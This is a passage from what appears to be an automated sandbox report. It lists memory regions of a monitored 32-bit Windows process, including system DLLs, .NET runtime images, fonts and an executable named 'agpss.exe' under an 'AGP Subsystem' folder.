filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2858
start_va = 0x76af0000
end_va = 0x76b7ffff
monitored = 0
entry_point = 0x76b06343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2859
start_va = 0x76c90000
end_va = 0x76d8ffff
monitored = 0
entry_point = 0x76cab6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2860
start_va = 0x77460000
end_va = 0x77469fff
monitored = 0
entry_point = 0x774636a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2861
start_va = 0x75270000
end_va = 0x7530cfff
monitored = 0
entry_point = 0x752a3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2862
start_va = 0x810000
end_va = 0x997fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 2863
start_va = 0x9b0000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 2864
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2865
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2866
start_va = 0x769a0000
end_va = 0x769fffff
monitored = 0
entry_point = 0x769b158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2867
start_va = 0x75040000
end_va = 0x7510bfff
monitored = 0
entry_point = 0x7504168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2868
start_va = 0x9c0000
end_va = 0xb40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009c0000"
filename = ""
Region:
id = 2869
start_va = 0xb70000
end_va = 0xbaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b70000"
filename = ""
Region:
id = 2870
start_va = 0xfb0000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fb0000"
filename = ""
Region:
id = 2871
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2872
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2874
start_va = 0x140000
end_va = 0x203fff
monitored = 1
entry_point = 0x204c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2875
start_va = 0x140000
end_va = 0x203fff
monitored = 1
entry_point = 0x204c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2876
start_va = 0x74fb0000
end_va = 0x74fb8fff
monitored = 0
entry_point = 0x74fb1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2906
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2907
start_va = 0x74050000
end_va = 0x747fefff
monitored = 1
entry_point = 0x7406d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2908
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2909
start_va = 0x73b90000
end_va = 0x73ba3fff
monitored = 0
entry_point = 0x73b9ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 2910
start_va = 0x73ae0000
end_va = 0x73b8afff
monitored = 0
entry_point = 0x73b75f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 2911
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 2912
start_va = 0x80000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 2913
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2914
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2915
start_va = 0x160000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2916
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2917
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 2918
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2919
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 2920
start_va = 0x1b0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2921
start_va = 0x390000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2922
start_va = 0x510000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 2923
start_va = 0x430000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2924
start_va = 0x480000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2925
start_va = 0x5b0000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2926
start_va = 0x710000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 2927
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2928
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2929
start_va = 0x1c0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2930
start_va = 0x23b0000
end_va = 0x43affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 2931
start_va = 0x390000
end_va = 0x42ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2932
start_va = 0xc40000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c40000"
filename = ""
Region:
id = 2933
start_va = 0xd90000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d90000"
filename = ""
Region:
id = 2934
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 2935
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 2936
start_va = 0x220000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 2937
start_va = 0x4510000
end_va = 0x460ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004510000"
filename = ""
Region:
id = 2938
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 2939
start_va = 0x4610000
end_va = 0x48defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2948
start_va = 0x72520000
end_va = 0x7392afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 2970
start_va = 0x75850000
end_va = 0x759abfff
monitored = 0
entry_point = 0x7589ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2971
start_va = 0x74610000
end_va = 0x7468ffff
monitored = 0
entry_point = 0x746237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2975
start_va = 0x48e0000
end_va = 0x4aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 2976
start_va = 0xc80000
end_va = 0xd5efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c80000"
filename = ""
Region:
id = 2979
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 3100
start_va = 0x74600000
end_va = 0x74602fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 3101
start_va = 0x74570000
end_va = 0x745f8fff
monitored = 1
entry_point = 0x74571130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 3102
start_va = 0x759b0000
end_va = 0x75a3efff
monitored = 0
entry_point = 0x759b3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 3103
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 3104
start_va = 0x71ac0000
end_va = 0x72514fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 3105
start_va = 0x743c0000
end_va = 0x74562fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 3106
start_va = 0x70c50000
end_va = 0x71ab5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 3107
start_va = 0x73e10000
end_va = 0x743b3fff
monitored = 1
entry_point = 0x7439b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 3108
start_va = 0x210000
end_va = 0x211fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 3110
start_va = 0x70430000
end_va = 0x70c47fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 3111
start_va = 0x742b0000
end_va = 0x743b4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 3112
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 3113
start_va = 0x6fcb0000
end_va = 0x70423fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 3114
start_va = 0x74290000
end_va = 0x742a2fff
monitored = 1
entry_point = 0x7429d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 3115
start_va = 0x4ab0000
end_va = 0x4d81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 3116
start_va = 0x75c40000
end_va = 0x76889fff
monitored = 0
entry_point = 0x75cc1601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 3117
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 3118
start_va = 0x74280000
end_va = 0x7428afff
monitored = 0
entry_point = 0x74281992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 3119
start_va = 0x48e0000
end_va = 0x4a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 3120
start_va = 0x4a70000
end_va = 0x4aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a70000"
filename = ""
Region:
id = 3121
start_va = 0x74260000
end_va = 0x74276fff
monitored = 0
entry_point = 0x742635fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 3122
start_va = 0x74240000
end_va = 0x74256fff
monitored = 0
entry_point = 0x74243573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 3123
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3124
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3125
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3126
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3127
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3128
start_va = 0x74200000
end_va = 0x7423afff
monitored = 0
entry_point = 0x7420128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3129
start_va = 0xbb0000
end_va = 0xc31fff
monitored = 0
entry_point = 0xbb19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3130
start_va = 0xbb0000
end_va = 0xc31fff
monitored = 0
entry_point = 0xbb19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3132
start_va = 0x74170000
end_va = 0x741f3fff
monitored = 0
entry_point = 0x741719a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3133
start_va = 0xda0000
end_va = 0xe7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000da0000"
filename = ""
Region:
id = 3135
start_va = 0x280000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 3136
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 3137
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3138
start_va = 0x73fe0000
end_va = 0x7416ffff
monitored = 0
entry_point = 0x7407d026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 3139
start_va = 0x4c0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3140
start_va = 0x4c0000
end_va = 0x4dbfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 3141
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3142
start_va = 0xdb0000
end_va = 0xdeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000db0000"
filename = ""
Region:
id = 3143
start_va = 0xe70000
end_va = 0xe7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 3144
start_va = 0x4e30000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 3145
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 3146
start_va = 0x48e0000
end_va = 0x49dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 3147
start_va = 0x49f0000
end_va = 0x4a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049f0000"
filename = ""
Region:
id = 3148
start_va = 0x4f30000
end_va = 0x4fdafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3149
start_va = 0x4f30000
end_va = 0x4fdafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3150
start_va = 0x4f30000
end_va = 0x63d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3151
start_va = 0x4f30000
end_va = 0x63d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3152
start_va = 0x4f30000
end_va = 0x63f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3153
start_va = 0x4f30000
end_va = 0x63f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3154
start_va = 0x4f30000
end_va = 0x5352fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3155
start_va = 0x4f30000
end_va = 0x5352fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3156
start_va = 0x4d90000
end_va = 0x4e2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3157
start_va = 0x4d90000
end_va = 0x4e2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3158
start_va = 0xbb0000
end_va = 0xc2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3159
start_va = 0xbb0000
end_va = 0xc2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3160
start_va = 0x4f30000
end_va = 0x512ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f30000"
filename = ""
Region:
id = 3161
start_va = 0x5130000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005130000"
filename = ""
Region:
id = 3162
start_va = 0x5210000
end_va = 0x52ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3163
start_va = 0x5210000
end_va = 0x52ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3164
start_va = 0x5210000
end_va = 0x52c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3165
start_va = 0x5210000
end_va = 0x52c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3166
start_va = 0xbb0000
end_va = 0xc37fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3167
start_va = 0xbb0000
end_va = 0xc37fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3168
start_va = 0xbb0000
end_va = 0xc39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3169
start_va = 0xbb0000
end_va = 0xc39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3170
start_va = 0x5210000
end_va = 0x5b3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
